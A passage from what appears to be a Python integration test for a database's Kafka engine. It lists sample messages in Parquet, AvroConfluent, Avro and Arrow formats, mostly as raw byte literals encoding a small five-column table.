b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
],
},
'AvroConfluent': {
'data_sample': [
avro_confluent_message(schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
b''.join([avro_confluent_message(schema_registry_client,
{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1}) for id in range(1, 16)]),
avro_confluent_message(schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'extra_settings': ", format_avro_schema_registry_url='http://{}:{}'".format(
kafka_cluster.schema_registry_host,
8081
),
'supports_empty_value': True,
},
'Avro': {
# It seems impossible to send more than one avro file per a message
# because of nature of Avro: blocks go one after another
'data_sample': [
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
avro_message([{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1} for id in range(1, 16)]),
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'supports_empty_value': False,
},
'Arrow' : {
'data_sample' : [
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00